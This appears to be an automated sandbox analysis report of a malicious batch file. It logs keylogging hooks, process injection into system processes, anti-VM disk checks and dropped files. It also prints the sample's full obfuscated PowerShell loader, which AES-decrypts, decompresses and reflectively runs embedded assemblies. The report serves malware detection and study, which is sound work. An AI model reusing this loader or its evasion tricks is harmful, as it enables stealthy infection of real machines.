Source: svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210283099.0000020D25681000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2316304169.0000020D25681000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

Operating System Destruction

barindex
Source: C:\Windows\System32\dllhost.exeProcess information set: 01 00 00 00

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 4544, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: x.batStatic file information: 7312129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IfMUlU.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,8_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,9_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,10_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED92C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,14_2_000002BAAED92C80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-SgIauazYJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IfMUlU.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001CF08_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002D4C8_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_00000001400031D08_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_00000001400012748_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_00000001400024348_2_0000000140002434
Source: C:\Windows\System32\winlogon.exeCode function: 9_3_00000225DC61CE189_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exeCode function: 9_3_00000225DC6123F09_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exeCode function: 9_3_00000225DC61CC949_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64DA189_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC642FF09_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64D8949_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67DA189_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC672FF09_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67D8949_2_00000225DC67D894
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6ADA189_2_00000225DC6ADA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6A2FF09_2_00000225DC6A2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6AD8949_2_00000225DC6AD894
Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000202C0ABCE1810_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000202C0ABCC9410_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000202C0AB23F010_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AEDA1810_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AED89410_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AE2FF010_2_00000202C0AE2FF0
Source: C:\Windows\System32\svchost.exeCode function: 11_3_000002A6612DCE1811_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exeCode function: 11_3_000002A6612D23F011_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exeCode function: 11_3_000002A6612DCC9411_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130DA1811_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A661302FF011_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130D89411_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAF19CE1814_3_000002BAAF19CE18
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAF19CC9414_3_000002BAAF19CC94
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAF1923F014_3_000002BAAF1923F0
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEDDCE1814_3_000002BAAEDDCE18
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEDD23F014_3_000002BAAEDD23F0
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEDDCC9414_3_000002BAAEDDCC94
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEE3CE1814_3_000002BAAEE3CE18
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEE323F014_3_000002BAAEE323F0
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEE3CC9414_3_000002BAAEE3CC94
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9DA1814_2_000002BAAED9DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED92FF014_2_000002BAAED92FF0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9D89414_2_000002BAAED9D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0DA1814_2_000002BAAEE0DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE02FF014_2_000002BAAEE02FF0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0D89414_2_000002BAAEE0D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6DA1814_2_000002BAAEE6DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE62FF014_2_000002BAAEE62FF0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6D89414_2_000002BAAEE6D894
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000002512A6B23F015_3_000002512A6B23F0
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000002512A6BCC9415_3_000002512A6BCC94
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000002512A6BCE1815_3_000002512A6BCE18
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6E2FF015_2_000002512A6E2FF0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6ED89415_2_000002512A6ED894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6EDA1815_2_000002512A6EDA18
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BEB0A0CE1816_3_000001BEB0A0CE18
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BEB0A023F016_3_000001BEB0A023F0
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BEB0A0CC9416_3_000001BEB0A0CC94
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3DA1816_2_000001BEB0A3DA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A32FF016_2_000001BEB0A32FF0
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3D89416_2_000001BEB0A3D894
Source: C:\Windows\System32\svchost.exeCode function: 20_3_0000026A8799CC9420_3_0000026A8799CC94
Source: C:\Windows\System32\svchost.exeCode function: 20_3_0000026A879923F020_3_0000026A879923F0
Source: C:\Windows\System32\svchost.exeCode function: 20_3_0000026A8799CE1820_3_0000026A8799CE18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CD89420_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879C2FF020_2_0000026A879C2FF0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CDA1820_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001795377CE1821_3_000001795377CE18
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001795377CC9421_3_000001795377CC94
Source: C:\Windows\System32\svchost.exeCode function: 21_3_00000179537723F021_3_00000179537723F0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537ADA1821_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537AD89421_2_00000179537AD894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537A2FF021_2_00000179537A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DDA1821_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DD89421_2_00000179537DD894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537D2FF021_2_00000179537D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002295D53CE1822_3_000002295D53CE18
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002295D53CC9422_3_000002295D53CC94
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002295D5323F022_3_000002295D5323F0
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56DA1822_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56D89422_2_000002295D56D894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D562FF022_2_000002295D562FF0
Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000253067DCE1823_3_00000253067DCE18
Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000253067D23F023_3_00000253067D23F0
Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000253067DCC9423_3_00000253067DCC94
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6DA1823_2_0000025306E6DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E62FF023_2_0000025306E62FF0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6D89423_2_0000025306E6D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECDA1823_2_0000025306ECDA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306EC2FF023_2_0000025306EC2FF0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECD89423_2_0000025306ECD894
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B39CC9424_3_000001845B39CC94
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B3923F024_3_000001845B3923F0
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B39CE1824_3_000001845B39CE18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CD89424_2_000001845B3CD894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3C2FF024_2_000001845B3C2FF0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CDA1824_2_000001845B3CDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFD23F025_3_000001ADEBFD23F0
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFDCE1825_3_000001ADEBFDCE18
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFDCC9425_3_000001ADEBFDCC94
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4D89425_2_000001ADECD4D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4DA1825_2_000001ADECD4DA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD42FF025_2_000001ADECD42FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D55904CC9426_3_000001D55904CC94
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D5590423F026_3_000001D5590423F0
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D55904CE1826_3_000001D55904CE18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907D89426_2_000001D55907D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D559072FF026_2_000001D559072FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907DA1826_2_000001D55907DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590AD89426_2_000001D5590AD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590A2FF026_2_000001D5590A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590ADA1826_2_000001D5590ADA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DD89426_2_000001D5590DD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590D2FF026_2_000001D5590D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DDA1826_2_000001D5590DDA18
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E723F029_3_00000241A9E723F0
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E7CE1829_3_00000241A9E7CE18
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E7CC9429_3_00000241A9E7CC94
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EA2FF029_2_00000241A9EA2FF0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EADA1829_2_00000241A9EADA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EAD89429_2_00000241A9EAD894
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD731623F030_3_000001CD731623F0
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD7316CE1830_3_000001CD7316CE18
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD7316CC9430_3_000001CD7316CC94
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD73192FF030_2_000001CD73192FF0
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319DA1830_2_000001CD7319DA18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319D89430_2_000001CD7319D894
Source: Joe Sandbox ViewDropped File: C:\Windows\$nya-onimai2\IfMUlU.exe 878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
Source: IfMUlU.exe.28.drStatic PE information: No import functions for PE file found
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2165
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2165Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173Jump to behavior
Source: Process Memory Space: powershell.exe PID: 4544, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Security.evtx.26.drBinary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.26.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.drBinary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.26.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.26.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.26.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.26.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exel
Source: System.evtx.26.drBinary string: C:\Device\HarddiskVolume3`
Source: System.evtx.26.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Security.evtx.26.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.26.drBinary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.26.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.26.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.26.drBinary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engineClassification label: mal100.spyw.evad.winBAT@34/71@1/1
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,8_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,8_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
Source: C:\Windows\$nya-onimai2\IfMUlU.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\9ce636af-4a7c-44b1-94b1-408678e3e7c4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5zsrksq.1t3.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', 